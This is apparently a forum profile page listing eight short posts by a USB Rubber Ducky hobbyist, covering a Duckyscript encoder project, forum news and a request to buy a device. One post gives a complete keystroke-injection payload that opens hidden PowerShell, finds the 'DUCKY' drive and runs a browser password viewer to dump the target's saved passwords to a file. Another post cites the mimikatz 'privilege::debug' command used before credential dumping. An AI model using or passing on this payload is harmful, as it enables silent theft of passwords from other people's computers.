Jump to content

Tamasco

Active Members
  • Posts

    9
  • Joined

  • Last visited

Everything posted by Tamasco

  1. This is the second project I see about Ducky Encoder! I love this community. Guess I wasn´t the only one that thought about building one I haven´t finish the multi language UI yet (just Spanish and English). https://github.com/Borja-Garduno/DuckEncoder
  2. Nice project! I started something similar months ago (just encoder) in Visual Basic .NET, but haven´t finish the multi language UI yet (just Spanish and English). https://github.com/Borja-Garduno/DuckEncoder
  3. I just saw that there is also available the REPLY command. Check it out: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
  4. This is another way: STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name DELAY 100 ENTER STRING cd $usbPath.name DELAY 100 ENTER
  5. True, my posts and user avatar are also gone. It looks like there has been a forum backup rollback.
  6. You need to use this command first: privilege::debug http://blog.gentilkiwi.com/mimikatz
  7. My Webbrowserpassview payload looks like this, and it works great. You can also add subfolders. DELAY 2000 GUI R DELAY 100 STRING powershell -windowstyle hidden DELAY 100 ENTER DELAY 1000 STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name DELAY 100 ENTER STRING cd $usbPath.name DELAY 100 ENTER STRING $timestamp = $(get-date -f MM-dd-yyyy_HH_mm_ss) DELAY 100 ENTER STRING $hostname = hostname DELAY 100 ENTER STRING $path = "p_"+$hostname+"_"+$timestamp+".txt" DELAY 100 ENTER STRING ./p /stext $path DELAY 100 ENTER STRING exit DELAY 100 ENTER
  8. Hi, I´m looking for a second hand USB Rubber Ducky. I´m from Spain. If you have an unused spare ducky, let me know how much you want for it. Thanks, Tamasco
×
×
  • Create New...